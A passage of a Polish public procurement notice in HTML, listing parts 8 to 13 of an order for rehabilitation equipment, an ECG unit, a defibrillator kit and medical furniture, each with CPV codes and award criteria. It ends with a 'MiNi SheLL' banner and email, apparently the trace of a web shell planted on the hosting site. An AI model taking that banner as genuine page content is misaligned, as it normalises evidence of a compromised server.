<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Taśmy, piłki 
Komplet 3 szt. Taśm mniejszego oporu o długości 1,5 m, kolory żółty, czerwony, zielony.
Piłki gimnastyczne: fi 65 cm, maksymalne obciążenie 120 kg - 1 szt. ; fi 75 cm, maksymalne obciążenie 120 kg - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rotory 
Rotor do ćwiczeń kończyn górnych. Rotor powinien posiadać płynną regulację oporu, regulacja wysokości w rotorze, możliwość montażu do kraty kabiny do ćwiczeń lub do ściany. Dane techniczne: długość 38 cm, wysokość 71 cm, waga 8 kg.
Rotor do ćwiczeń kończyn dolnych - rower treningowy. Dane techniczne: maksymalna waga użytkownika 100 kg, system oporu  mechaniczny, płynna ręczna regulacja oporu, regulacja wysokości siedziska, kierownica pokryta miękką pianką, pedały z paskami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> stoły
Stół do masażu z ręczną zmianą wysokości,  7-segmentowy przeznaczony do masaży suchych, lekka i stabilna konstrukcja , regulacja wysokości przy pomocy ręcznego podnośnika śrubowego, podnośnik lędźwiowy regulowany ręcznie poprzez pokręcanie leżyskiem, bez otworu na twarz. Dodatkowe opcje: sterowanie pilotem nożnym, okrągłe wycięcie z miękką poduszka i zatyczką, uchwyt na ręcznik papierowy, kółka jezdne, komplet klinów do masażu.
Dane techniczne: leżysko 1950 x 680 mm, wysokość  stołu od 450 do 950 mm, kąt odchylenia zagłówka -80 do 45 stopni, kąt odchylenie podnóżka od 0 do 40 stopni, regulacja podłokietników  od 0 do 180 mm, wysokość podnośnika lędźwiowego max. 90 mm, dopuszczalne obciążenie 200 kg.
Stół rehabilitacyjny  składający się z dwóch segmentów. Regulacja wysokości przy pomocy ręcznego podnośnika dla wersji manualnej. Stół powinien posiadać dwa otwory znajdujące się w części leża oraz podgłówku. Po bokach stołu powinny być uchwyty do mocowania pasów stabilizacyjnych. Wysokość stołu regulowana od 60 do 88 cm, regulacja wysokości ręczna - korbą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat EKG 12-kanałowy z oprzyrządowaniem, mobilny.                                                                                                    
W skład zestawu wchodzi elektrokardiograf, wózek medyczny oraz laserowa drukarka zewnętrzna umożliwiająca wydruk w formacie A4. 				Specyfikacja techniczna: kolorowy wyświetlacz graficzny, panel dotykowy, klawiatura alfanumeryczna i funkcyjna, sygnalizacja złego podłączenia poszczególnych elektrod, baza pacjentów z pamięcią 500 badań, możliwość wydruku badania na drukarce zewnętrznej w formacie A4, magazynowanie badań na pamięci USB, możliwość przenoszenia badań do i z komputera użytkownika lub innego aparatu ekg , komunikacja z komputerem PC poprzez interfejs USB, możliwość wykonania badan spirometrycznych, automatyczna analiza i  interpretacja, praca w trybie auto  lub manual, sygnał ekg z 12 odprowadzeń standardowych, , prezentacja na ekranie przebiegów z 3, 6 lub 12 odprowadzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Defibrylator z  zestawem do reanimacji wraz z torbą transportową, elektrodami wielofunkcyjnymi i 10 szt. baterii. Opis defibrylatora: prosta obsługa, tryb półautomatyczny, defibrylacja dwufazowa niskoenergetyczna, komunikaty głosowe i tekstowe prowadzące przez wszystkie czynniki ratownicze, interfejs graficzny, monitor LCD min. 3, pamięć  wewnętrzna, zasilane bateryjne, trwałość baterii min. 5 lat w trybie gotowości do użycia, okres przydatności elektrod min. 5 lat, powinien posiadać wskaźnik sprawności aparatu i rozładowania baterii, Elektrody z wbudowanym czujnikiem głębokości i tempa ucisku. Parametry techniczne: energia defibrylacji od 50 do 200 J; impuls defibrylacyjny dwufazowy, niskoenergetyczny i typu RBW; czas ładowania 10 sekund do energii 200 J; podtrzymanie ładunku 30 sekund; zakres pomiaru częstości  akcji serca (HR) od 30 do 300 ud/min; wzmocnienie ekg regulowane automatycznie, pamięć 3,5 godz. Zapisu; odporny na wstrząsy, wibracje, pyły, i wodę. Zestaw reanimacyjny powinien zawierać: butlę tlenowa 2 l, reduktor z szybkozłączem typu AGA ze skokowa regulacja przepływu O2 od 0 do 25 l na  min ze złączką tlenową, worek samorozprężalny silikonowy z rezerwuarem tlenu i maskami nr 3 i 5 ; maski do prowadzenia tlenoterapii dla dorosłych, filtry antybakteryjne min. 5 szt; ssak ręczny z pojemnikiem i cewnikami lub ręczno nożny; laryngoskop z oświetleniem standardowym  z łyżkami MC nr 1,2,3, rurki ustno gardłowe typu Guedala 6 rozmiarów;  kleszcze Megilla;  rurki intubacyjne nr 6,7,8,10; latarka diagnostyczna; kompres gazowy 5 x 5 cm; płyn do dezynfekcji min 25 ml; nóż i nożyczki ratownicze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> meble medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Meble medyczne  
1. Krzesło obrotowe kąpielowe - prysznicowe. Konstrukcja ze stali nierdzewnej, otwory w siedzisku ułatwiające ociekanie wody, regulacja wysokości od 39 do 49 cm szerokość siedziska 50 cm +/- 2cm, głębokość siedziska 37 cm +/- 2 cm, wysokość oparcia 37 cm +/- 2 cm, maksymalne obciążenie nie mniej niż 110 kg.
2.  Przyłóżkowa szafka medyczna 2 szt. wyposażona w szufladę, w drzwiczkach uchwyt i zatrzask magnetyczny. Szafka i szuflada otwierają się z obu stron. Blat z powłoką melaminową, z regulowana wysokością położenia oraz możliwością swobodnego obrotu, wysunięcia i położenia. Szafka powinna posiadać kółka, a w dwóch z nich powinna być blokada. Wymiary wys. 800 mm , szer. 610 mmcm gł. 420 mm,  +/- 50mm
3. Szafa medyczna wykonana z blachy, drzwi przeszklone, półki ze szkła przestawne co 25mm, drzwi zamykane na klucz z zamkiem ryglujący w dwóch punktach. Wymiary wysokość ok 1800 mm , szerokość 600 mm, głębokość 435 mm . 
4. Leżanka trzyczęściowa z uchwytem na prześcieradło szt. 3 . Konstrukcja z profili stalowych pokrytych farba proszkowa, nogi zabezpieczone stopkami z tworzywa, leże i wezgłowie z płyty pokrytej pianką poliuretanową i obszyte materiałem zmywalnym. Szerokość 700mm długość minimum 1900mm, wysokość  ok 720 mm, kat nachylenia wezgłowia i nóg  od 0 do 30 stopni, obciążenie do 150 kg
5. Stojak na kroplówkę na kółkach, konstrukcja metalowa pokryta farbą proszkowa i powłoka galwaniczna.
6. Krzesło zmywalne szt. 25. Konstrukcja stal chromowana , siedzisko i oparcie pokryte eko skórą.
7. Fotel obrotowy z podłokietnikiem szt. 1 . Wykonany z ekoskóry, posiada regulowana wysokość, grube wysokie oparcie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com